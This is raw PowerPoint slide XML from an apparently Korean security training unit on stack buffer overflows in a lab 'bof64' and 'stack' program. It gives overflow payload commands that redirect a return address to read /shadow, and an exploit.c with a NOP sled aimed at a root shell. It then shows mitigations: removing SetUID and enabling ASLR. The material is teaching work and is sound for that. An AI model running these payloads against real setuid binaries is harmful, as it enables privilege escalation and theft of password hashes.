              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수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./bof64 $(python -c 'print "A"*24+"\x35\x06\x40"‘)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※ bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수의 시작 주소는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>0x0000000000400635</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>이나</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>,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인텔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x86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및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x64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아키텍처는 리틀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>엔디언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(little endian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000" dirty="0"/>
              <a:t>을 사용하므로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>복귀 주소에 역으로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0x3506400000000000) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력한다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7033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7" name="Picture 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8979F9E7-D4D4-4823-98DC-C11837B3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78" y="842130"/>
            <a:ext cx="4945761" cy="274459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7EB1C4-726B-4F6C-863A-6B565A966529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="518232" y="4172331"/>
          <a:ext cx="4932807" cy="171113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368581315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49492"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="14081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/shadow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외의 사용자는 접근할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783995"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46085" name="_x564965576">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD50D22F-5C9F-4AB1-991A-AE7A350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5" y="4726843"/>
            <a:ext cx="45942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_x564966080">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89101173-22A0-4202-A176-F2AD9B34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5" y="5242131"/>
            <a:ext cx="3413125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6ED209E0-61F7-41D0-8AA4-527392A4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97" y="4276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F02A76-5DC1-47DA-9569-0C049FE31AE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6278110" y="434292"/>
          <a:ext cx="4932807" cy="3906393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6115782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49629"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="35999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경우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직후의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종료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0x0000000000400635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bar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시작 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복귀한다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931332"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46087" name="_x564893288">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEAF4901-2586-4E1D-9D27-DAC7A263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16" y="1079106"/>
            <a:ext cx="3297023" cy="267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CA5A70-20C7-4B00-9BF3-CC1B3F3C63F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="4543284"/>
            <a:ext cx="5616792" cy="19457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1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>재실행 및 출력 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>리다이렉션으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>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내용을 파일에 출력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./bof64 $(python -c 'print "A"*24+"\x35\x06\x40") &gt; 1.txt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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) acheck </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 파일명을 입력하여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acheck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파일명</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{173B945A-D41B-48A0-A7DB-8F01DC99C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473" y="5036948"/>
            <a:ext cx="5408912" cy="35955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91A830-1CD8-4D18-B2B4-3D8F8E924E2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59602A3-7E10-4F9E-8FF1-4BCC8DD6EED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C01971-F23F-4103-95FA-1CDA044D281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화살표: 오른쪽 17">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F56AF0A1-DD33-438C-B604-98229F633DC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70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보안 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{411A4485-4317-4F31-A74B-0E009D382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오버플로우가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발생하더라도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/shadow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출력되지 않도록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조치하시오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SetUID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u-s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ASLR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활성화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sysctl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 kernel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randomize_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space=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17" name="Picture 4" descr="목표 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02A091AA-30F6-4270-8E55-4E599BAF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CA05AE-7C1C-425E-A911-D5525EA28A2E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B415383-2E2E-4BCE-85C7-5B35E10E2B32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E1F945-D42A-4F25-B58D-E50A41EB32B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8" descr="cent os 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A443AC1F-F004-4379-9D4E-3A82ABE02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2F75C4-5F19-47F6-8EB1-6AAF8693BF3C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F7DF4A-2C59-43D2-9E01-C977F57C8F1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C5224-3F64-4BC4-8DE3-421FE378DF1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19855F-303D-42F3-BC9E-336CBFA4E05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E1920E64-DD82-46FA-83AC-2C0E0689918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2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SetUID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정 해제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us- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/bof64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ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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sysctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>w kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>randomize_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>va</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>space=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7" name="Picture 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A05B8A24-0AD6-437D-9E5E-16BC5C81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4" y="1286850"/>
            <a:ext cx="4085971" cy="69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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87373DF7-8165-4254-A426-601E5AD8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8" y="2788920"/>
            <a:ext cx="4039489" cy="640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911AFB-14D1-43A0-92BB-DDE8EC1868EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="497685" y="3540329"/>
          <a:ext cx="4932807" cy="268649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3879104180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04609"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="23354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제거된 경우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권한이 아닌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bof64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실행한 계정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아래의 경우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test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권한으로 실행되므로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/shadow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접근할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098530"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50177" name="_x564840440">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA46C84B-BAC3-469D-AFCB-A99AF393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1" y="4314277"/>
            <a:ext cx="4691063" cy="18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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EA22538-687D-4085-8FE9-18C4C1EB99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9990" r="-122"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6310085" y="904875"/>
            <a:ext cx="4843690" cy="49177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B8B31A-EFFF-45B0-9BAA-885DBA00D0F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6308677" y="1523070"/>
          <a:ext cx="4589304" cy="4840394"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4589304">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2128152829"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2291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260" marR="60260" marT="16660" marB="16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65321"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="41222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ASLR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활성화되면 스택에 있는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tmp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주소가 실행시마다 변경됨을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영역의 주소는 바뀌지 않음을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260" marR="60260" marT="16660" marB="16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801801"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50179" name="_x564904520">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{018268F2-EA4E-4654-AC73-9D03699D0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b="886"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6376307" y="2253456"/>
            <a:ext cx="2763947" cy="38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AD6DB3-D844-4C5A-95C9-894E39AA1B0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A21F91F-1DC3-4908-B966-1CB4DD16BC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EF4009-4F0A-4E24-B8DD-1AF25D60AA3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1CB51EAB-7C62-4CB0-98D3-6CB1BA97D09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78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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>확인을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>위해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정으로 변경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err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> test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 이용 공격 수행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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/bof64 $(python -c 'print "A"*24+"\x35\x06\x40")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파일 내용 출력이 되지 않음을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B975456-1230-4EEF-9616-8DA77ABF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6" y="1296225"/>
            <a:ext cx="4907534" cy="18073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DB69B-C4ED-4FDF-8DE0-E8E414C60830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루트 계정으로 복귀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exit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08284D-650F-4B1A-A1F3-5EDBF3FD238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226DAED-DF29-4C7C-9638-4E9BB63E060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EA2D6-0F3A-4B8B-AD25-4708E3D64A9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화살표: 오른쪽 11">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5547EF7-E9FE-4EA6-BF78-076A8734565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15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/Training/Unit/Sys/9</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 9. BOF -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쉘코드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/stack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 코드가 포함된 페이로드를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만드는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exploit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.c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루트 쉘을 획득하라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디스어셈블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 intel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이름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쉘코드를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및 실행할 수 있다</a:t>
            </a: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공격에 대응할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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5.11, 32-bit)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2AB61B-0024-401E-B838-EF52D8D8BB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0915F6-E77C-4AF8-B5FA-3419167E891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B0AD85-FEC3-4365-A757-F8F8537D18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4779363B-6B6A-444B-9500-99AD02B021B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41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3A7CE2-82B6-4927-9876-5F31E4C6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" y="1856821"/>
            <a:ext cx="5364243" cy="40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C0586F6-8ECF-4283-A457-03F47D6E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08" y="1856821"/>
            <a:ext cx="5726611" cy="42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9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/stack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ls –l stack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stack.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>stack.c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※ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>bof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수에 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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수 사용으로 인한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취약점이 존재함을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ojdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>사용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>disassemble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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>M intel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-d stack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※ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>시작으로부터</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 복귀 주소 시작까지의 거리는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>28</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>바이트</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBA8D715-5190-4363-ADE3-5ED45E7A1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" t="9793" r="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="547007" y="1325678"/>
            <a:ext cx="4953262" cy="39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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51745194-F882-49F5-84C8-35FB497B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7" y="2386554"/>
            <a:ext cx="5012436" cy="280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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62AC64D9-E07F-4522-A4F9-5985CFEB79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-30" b="50027"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6285593" y="475692"/>
            <a:ext cx="4948464" cy="14429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88A016-BAFF-492D-AA4E-0F78C665F132}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6319647" y="2189525"/>
          <a:ext cx="4532687" cy="4202566"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4532687">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3992703851"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2335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516" marR="59516" marT="16454" marB="16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35082"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="39592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bof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진입 시점의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buffer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버퍼의 크기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(24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더 긴 문자열을 넘기면 복귀 주소를 변경시킬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9516" marR="59516" marT="16454" marB="16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348403"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47105" name="_x564888896">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EB31F6E-30A6-4412-BD4E-A74C36C7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48" y="2778157"/>
            <a:ext cx="3559973" cy="31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29A799-8B06-46A4-82F5-321CBE3BBB8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7A76B71-EAB6-407A-AF8A-E844ADFC790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856923-BDBB-4924-909E-1BED1969E7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20157A6D-010D-4CF6-97F5-EAA085FA6A6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86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1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en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/exploit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vi exploit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en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/exploit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  <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>빌드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 dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>o exploit exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>.c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7) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일을 이용한 페이로드 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./exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>28</a:t>
            </a:r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68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70E56183-D24B-467D-8876-01211AFE7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" b="1886"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="520699" y="866624"/>
            <a:ext cx="4901983" cy="27020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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25CF1106-5283-424F-AF5B-97A01DDAC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t="4646" r="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="550327" y="4311650"/>
            <a:ext cx="4925568" cy="5118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72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A24B75ED-6B35-4C94-AB13-3FC6A450D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8" t="-277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="550327" y="5334930"/>
            <a:ext cx="4929506" cy="7061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8F384F-0013-4CBA-BB0F-60762091DAD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6265233" y="493694"/>
          <a:ext cx="5475010" cy="4580825"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2486881">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3675159690"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2988129">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="574915489"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="21201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84636"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4339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먼저 페이로드를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채운다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memset (&amp; buffer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0x90, 517); //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nop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effectLst/>
                        </a:rPr>
                        <a:t>buffer </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>버퍼 시작 주소 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>+ 28</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>에 복귀 주소가 저장된다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"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</a:rPr>
                        <a:t>복귀 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>주소는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>buffer </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>버퍼 시작 주소 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>+ 32</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>가 저장된다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"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</a:rPr>
                        <a:t>즉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다음과 같은 페이로드가 준비된다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((long *)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(buffer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 off)) = (long)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(buffer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 off + 4);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31132"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49155" name="_x564938936">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88597877-B49A-47BC-BAEF-49FD673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29" y="1876626"/>
            <a:ext cx="2298877" cy="31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4" name="_x564941312">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DAC8B12-17AD-4D77-8624-505DB0302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636" y="1876626"/>
            <a:ext cx="2298877" cy="31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3B1750-BBDB-4A5D-932C-555DCB1F22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912D2A2-974C-4D35-B0BA-0858CAC749C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7A27E9-BB2D-41E3-B51E-46BA51DF3FC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A077C7EA-A0C4-466B-8124-6B7D9EE6C4D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82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8) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
